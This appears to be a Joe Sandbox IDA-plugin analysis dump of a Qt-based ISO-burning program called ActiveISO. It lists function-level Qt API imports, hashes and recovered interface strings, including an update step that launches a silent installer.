                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Data@FileTyped$ByteDevice@@V0@@$CaseFile@@Qt@@@Sensitivity@String@@@$?remove@?replace@?setArray@@Edit@@End@Flags@LineLower@OpenText@V1@0$?close@?get?index?open@?read?resize@?tr@Array@@@Array@@_Device@@@@@Dialog@@Dialog@@@@@Flag@Line@MetaModeName@Object@@Option@V2@11Widget@@
                                                                                                                  • String ID: Ini Text Files (*.ini);;Key Text Files (*.key);;All Files (*.*)$Open Text File$key$name
                                                                                                                  • API String ID: 263266584-219429815
                                                                                                                  • Opcode ID: 756a16c71668853419a216a0978fd78e7365ef542cac432ed49cedf644c95117
                                                                                                                  • Instruction ID: 1f4a9e319e3bc26cb8eeb9b06657e23bd0f33f6d0437a5ce7bb3f16796e62820
                                                                                                                  • Opcode Fuzzy Hash: 756a16c71668853419a216a0978fd78e7365ef542cac432ed49cedf644c95117
                                                                                                                  • Instruction Fuzzy Hash: D3C12F32E14A46AAFB00DF74E8961E83372FB45B59F495231D91EB29E4DF38D509C384
                                                                                                                  APIs
                                                                                                                  • ?text@QLineEdit@@QEBA?AVQString@@XZ.QT5WIDGETS ref: 00007FF65372F436
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65372F446
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65372F45A
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65372F46E
                                                                                                                  • ?warning@QMessageBox@@SA?AW4StandardButton@1@PEAVQWidget@@AEBVQString@@1V?$QFlags@W4StandardButton@QMessageBox@@@@W421@@Z.QT5WIDGETS ref: 00007FF65372F48D
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65372F498
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65372F4A3
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65372F4CE
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65372F4E4
                                                                                                                  • ?warning@QMessageBox@@SA?AW4StandardButton@1@PEAVQWidget@@AEBVQString@@1V?$QFlags@W4StandardButton@QMessageBox@@@@W421@@Z.QT5WIDGETS ref: 00007FF65372F507
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65372F512
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65372F51D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Data@MessageStandardTyped$?warning@Box@@Box@@@@Button@Button@1@Flags@String@@1W421@@Widget@@$?text@Edit@@Line
                                                                                                                  • String ID: Making ISO$Media is blank.$No devices being found.$No media inserted.$Select ISO file name.$Warning
                                                                                                                  • API String ID: 963239914-3602614229
                                                                                                                  • Opcode ID: f259fde4b7ba2a7e142c66f62a4a6e4f6db8a18d729dc0e7ff6757097c0e3545
                                                                                                                  • Instruction ID: 23a913af1630a1718d1652c450e0f4f2d3d2dd26ada289138ccb2708e78bfd55
                                                                                                                  • Opcode Fuzzy Hash: f259fde4b7ba2a7e142c66f62a4a6e4f6db8a18d729dc0e7ff6757097c0e3545
                                                                                                                  • Instruction Fuzzy Hash: 2AB10032E24A429AE710DF74D8963B82362FB88F59F491131E61EE3A64DF3CD559C384
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Data@@$List$File$Dialog@@$TreeWidget@@$Array$?dispose@?fromAscii_helper@Data@Data@1@@Item@@TypedWidget$?begin@?current?setItem@V0@@$Directory@Flags@Option@String@@@$?allocate@?append@?at@?detach@?end@?exec@?get?selected?show@?start@?text@?top?tr@AllocationArray@@ByteData@1@Data@@@@@DialogDialog@@@@@Empty@ExistingFiles@Index@LabelLabel@1@LevelList@@Long@MetaMode@Mode@1@@Object@@Priority@1@@StringString@@11@Text@Thread@@U1@_V0@$$V1@@V2@1
                                                                                                                  • String ID: Add Folder$Populating the file tree
                                                                                                                  • API String ID: 2024920375-2690863232
                                                                                                                  • Opcode ID: be78e3d58502d19ac23d660f83bcc36efc0a3e4ea1933531e82d1444770d1f36
                                                                                                                  • Instruction ID: 67aef9e0790d942de2066929dd106f1383ec1bda6c21b4a56fa167946505a4f8
                                                                                                                  • Opcode Fuzzy Hash: be78e3d58502d19ac23d660f83bcc36efc0a3e4ea1933531e82d1444770d1f36
                                                                                                                  • Instruction Fuzzy Hash: 80F13D32E29A469AFB10CB65E9961BC3362FB44F45F884135DA0EB36A4DF3CE549C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Byte$Array@@$String@@$V0@@$?data@Ref@@Stream@@TextV0@$$$?append@?read@Array@@_Device@@$?from?remove@$?clear@?read?setAll@ArrayArray@@@Ascii_helper@Bit@Codec@Data@Device@@@@@Flag@Flags@Local8ModeOpenTyped
                                                                                                                  • String ID: UTF-16
                                                                                                                  • API String ID: 2018382022-2803831189
                                                                                                                  • Opcode ID: e16906374a18d7681413b44b479820d8c61809bf2a40b34c0576006ac5a5a9e7
                                                                                                                  • Instruction ID: 7c9f5fe33ae62213fdd3c01a0cb415eff0069d40ce6f68f377ba5acfca68efa5
                                                                                                                  • Opcode Fuzzy Hash: e16906374a18d7681413b44b479820d8c61809bf2a40b34c0576006ac5a5a9e7
                                                                                                                  • Instruction Fuzzy Hash: BEE19132E28A41D6EB10DF60E8852AD7772FB94B45F894031EA4EE3A68DF3CD548C744
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF653750FF0: ?tr@QMetaObject@@QEBA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF653751016
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF653750877
                                                                                                                  • ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE ref: 00007FF653750892
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF6537508B7
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537508C2
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537508CD
                                                                                                                  • ?setRange@QProgressBar@@QEAAXHH@Z.QT5WIDGETS ref: 00007FF6537508DE
                                                                                                                  • ?setValue@QProgressBar@@QEAAXH@Z.QT5WIDGETS ref: 00007FF6537508EB
                                                                                                                    • Part of subcall function 00007FF65371F8B0: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF65371F8D3
                                                                                                                    • Part of subcall function 00007FF65371F8B0: ?append@QString@@QEAAAEAV1@AEBV1@@Z.QT5CORE ref: 00007FF65371F8E7
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65375093A
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653750945
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653750950
                                                                                                                    • Part of subcall function 00007FF653746680: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746704
                                                                                                                    • Part of subcall function 00007FF653746680: ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF65374671C
                                                                                                                    • Part of subcall function 00007FF653746680: ?arg@QString@@QEBA?AV1@HHHVQChar@@@Z.QT5CORE ref: 00007FF653746743
                                                                                                                    • Part of subcall function 00007FF653746680: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537468D0
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF65374611E
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??0QString@@QEAA@$$QEAV0@@Z.QT5CORE ref: 00007FF653746150
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF653746390
                                                                                                                  • ??8@YA_NAEBVQString@@0@Z.QT5CORE ref: 00007FF653750988
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653750996
                                                                                                                    • Part of subcall function 00007FF6537460F0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746167
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF653746177
                                                                                                                    • Part of subcall function 00007FF6537460F0: ?arg@QString@@QEBA?AV1@HHHVQChar@@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF65374619B
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF6537461A8
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF6537461B2
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF653746346
                                                                                                                    • Part of subcall function 00007FF6537460F0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF653746358
                                                                                                                    • Part of subcall function 00007FF6537460F0: ??1QSettings@@UEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF65374E9D0), ref: 00007FF653746385
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537509BF
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537509DD
                                                                                                                  • ?currentDate@QDate@@SA?AV1@XZ.QT5CORE ref: 00007FF6537509EB
                                                                                                                  • ?toString@QDate@@QEBA?AVQString@@AEBV2@@Z.QT5CORE ref: 00007FF6537509FC
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653750A16
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653750A23
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653750A40
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653750A5D
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653750A77
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653750A94
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653750AAA
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653750AC0
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653750AD6
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653750AEC
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653750B3C
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653750B47
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653750B52
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653750B5D
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653750B68
                                                                                                                  • ?start@QProcess@@QEAAXAEBVQString@@AEBVQStringList@@V?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z.QT5CORE ref: 00007FF653750B86
                                                                                                                  • ?singleShot@QTimer@@SAXHPEBVQObject@@PEBD@Z.QT5CORE ref: 00007FF653750B9B
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653750BE7
                                                                                                                  • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FF653750BF5
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653750C00
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653750C0A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?from$ArrayAscii_helper@Data@Typed$Char@@@V0@@$Array@@Byte$?set$?arg@Char@@Latin1$Bar@@Date@@Label@@Object@@ProgressString@@@Text@$??8@?append@?current?dispose@?single?start@?tr@A@$$Data@1@@Data@@Date@Device@@@@@Flag@Flags@ListList@@MetaModeOpenProcess@@Range@Settings@@Shot@StringString@String@@0@Timer@@Utf8@V0@$$V1@@V2@@Value@
                                                                                                                  • String ID: /CLOSEAPPLICATIONS$/NOCANCEL$/RESTARTAPPLICATIONS$/SILENT$/SP-$1InstallProgress()$Downloaded to %1$Installing...$dd-MMM-yyyy
                                                                                                                  • API String ID: 2925468586-1241669276
                                                                                                                  • Opcode ID: f8aeb38852426a1a34cd81ad5b885202e8f485d155edb59f4e63ba5ccd36e213
                                                                                                                  • Instruction ID: e53ad31656901f5b278ce79eb40c44b8c5be7e5a7468c96cc90eb11bc5759ea2
                                                                                                                  • Opcode Fuzzy Hash: f8aeb38852426a1a34cd81ad5b885202e8f485d155edb59f4e63ba5ccd36e213
                                                                                                                  • Instruction Fuzzy Hash: 42C11C32F15A429AFB00DFA4D8922AC3372FB44B49B454035DA1EB7AA5DF38E559C384
                                                                                                                  APIs
                                                                                                                  • ??0QDialog@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF653717B89
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF653717BAC
                                                                                                                    • Part of subcall function 00007FF65371F710: ??0QThread@@QEAA@PEAVQObject@@@Z.QT5CORE(?,?,00000000,00007FF653717BC1), ref: 00007FF65371F719
                                                                                                                    • Part of subcall function 00007FF65371A620: ?objectName@QObject@@QEBA?AVQString@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A644
                                                                                                                    • Part of subcall function 00007FF65371A620: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A655
                                                                                                                    • Part of subcall function 00007FF65371A620: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A66E
                                                                                                                    • Part of subcall function 00007FF65371A620: ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A67B
                                                                                                                    • Part of subcall function 00007FF65371A620: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A686
                                                                                                                    • Part of subcall function 00007FF65371A620: ?setWindowModality@QWidget@@QEAAXW4WindowModality@Qt@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A694
                                                                                                                    • Part of subcall function 00007FF65371A620: ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A6A6
                                                                                                                    • Part of subcall function 00007FF65371A620: ??0QSizePolicy@@QEAA@W4Policy@0@0W4ControlType@0@@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A6BB
                                                                                                                    • Part of subcall function 00007FF65371A620: ?setHorizontalStretch@QSizePolicy@@QEAAXH@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A6C7
                                                                                                                    • Part of subcall function 00007FF65371A620: ?setVerticalStretch@QSizePolicy@@QEAAXH@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A6D3
                                                                                                                    • Part of subcall function 00007FF65371A620: ?sizePolicy@QWidget@@QEBA?AVQSizePolicy@@XZ.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A6E0
                                                                                                                    • Part of subcall function 00007FF65371A620: ?hasHeightForWidth@QSizePolicy@@QEBA_NXZ.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A6E9
                                                                                                                    • Part of subcall function 00007FF65371A620: ?setHeightForWidth@QSizePolicy@@QEAAX_N@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A6F6
                                                                                                                    • Part of subcall function 00007FF65371A620: ?setSizePolicy@QWidget@@QEAAXVQSizePolicy@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A702
                                                                                                                    • Part of subcall function 00007FF65371A620: ??0QSize@@QEAA@HH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A715
                                                                                                                    • Part of subcall function 00007FF65371A620: ?setMinimumSize@QWidget@@QEAAXAEBVQSize@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A721
                                                                                                                    • Part of subcall function 00007FF65371A620: ??0QSize@@QEAA@HH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A734
                                                                                                                    • Part of subcall function 00007FF65371A620: ?setMaximumSize@QWidget@@QEAAXAEBVQSize@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A740
                                                                                                                    • Part of subcall function 00007FF65371A620: ??0QLabel@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A760
                                                                                                                    • Part of subcall function 00007FF65371A620: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A790
                                                                                                                    • Part of subcall function 00007FF65371A620: ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A79E
                                                                                                                    • Part of subcall function 00007FF65371A620: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF653717BCE), ref: 00007FF65371A7A9
                                                                                                                  • ?setWindowFlags@QWidget@@QEAAXV?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF653717BD6
                                                                                                                  • ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS ref: 00007FF653717BE8
                                                                                                                  • ?headerItem@QTreeWidget@@QEBAPEAVQTreeWidgetItem@@XZ.QT5WIDGETS ref: 00007FF653717BF5
                                                                                                                  • ?setHidden@QTreeWidgetItem@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF653717C00
                                                                                                                    • Part of subcall function 00007FF653719B30: ?move@QWidget@@QEAAXAEBVQPoint@@@Z.QT5WIDGETS ref: 00007FF653719B72
                                                                                                                    • Part of subcall function 00007FF653719B30: ?move@QWidget@@QEAAXAEBVQPoint@@@Z.QT5WIDGETS ref: 00007FF653719B8E
                                                                                                                    • Part of subcall function 00007FF653719B30: ?move@QWidget@@QEAAXAEBVQPoint@@@Z.QT5WIDGETS ref: 00007FF653719BAA
                                                                                                                    • Part of subcall function 00007FF653719B30: ?move@QWidget@@QEAAXAEBVQPoint@@@Z.QT5WIDGETS ref: 00007FF653719BC6
                                                                                                                    • Part of subcall function 00007FF653719B30: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653719BD8
                                                                                                                    • Part of subcall function 00007FF653719B30: ??0QIcon@@QEAA@AEBVQString@@@Z.QT5GUI ref: 00007FF653719BEA
                                                                                                                    • Part of subcall function 00007FF653719B30: ?setIcon@QAbstractButton@@QEAAXAEBVQIcon@@@Z.QT5WIDGETS ref: 00007FF653719BF8
                                                                                                                    • Part of subcall function 00007FF653719B30: ??1QIcon@@QEAA@XZ.QT5GUI ref: 00007FF653719C03
                                                                                                                    • Part of subcall function 00007FF653719B30: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653719C0E
                                                                                                                    • Part of subcall function 00007FF653719B30: ?setMinimumHeight@QWidget@@QEAAXH@Z.QT5WIDGETS ref: 00007FF653719C1C
                                                                                                                    • Part of subcall function 00007FF653719B30: ?setMaximumHeight@QWidget@@QEAAXH@Z.QT5WIDGETS ref: 00007FF653719C2A
                                                                                                                    • Part of subcall function 00007FF653769FB8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,FFFFFFFF,00007FF65371257E), ref: 00007FF653769FD2
                                                                                                                    • Part of subcall function 00007FF65373B660: ??0QDialog@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65373B67A
                                                                                                                    • Part of subcall function 00007FF65373B660: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF65373B69A
                                                                                                                    • Part of subcall function 00007FF65373B660: ?setTextFormat@QLabel@@QEAAXW4TextFormat@Qt@@@Z.QT5WIDGETS ref: 00007FF65373B6B3
                                                                                                                    • Part of subcall function 00007FF65373B660: ?setWindowFlags@QWidget@@QEAAXV?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65373B6C1
                                                                                                                    • Part of subcall function 00007FF65373B660: ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS ref: 00007FF65373B6D5
                                                                                                                    • Part of subcall function 00007FF65373B660: ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS ref: 00007FF65373B708
                                                                                                                    • Part of subcall function 00007FF65373B660: ?move@QWidget@@QEAAXAEBVQPoint@@@Z.QT5WIDGETS ref: 00007FF65373B727
                                                                                                                    • Part of subcall function 00007FF65373B660: ?move@QWidget@@QEAAXAEBVQPoint@@@Z.QT5WIDGETS ref: 00007FF65373B746
                                                                                                                    • Part of subcall function 00007FF65373B660: ??4QString@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FF65373B757
                                                                                                                    • Part of subcall function 00007FF65373B660: ??0QTimer@@QEAA@PEAVQObject@@@Z.QT5CORE ref: 00007FF65373B775
                                                                                                                    • Part of subcall function 00007FF65373B660: ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF65373B7AF
                                                                                                                    • Part of subcall function 00007FF65373B660: ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF65373B7BA
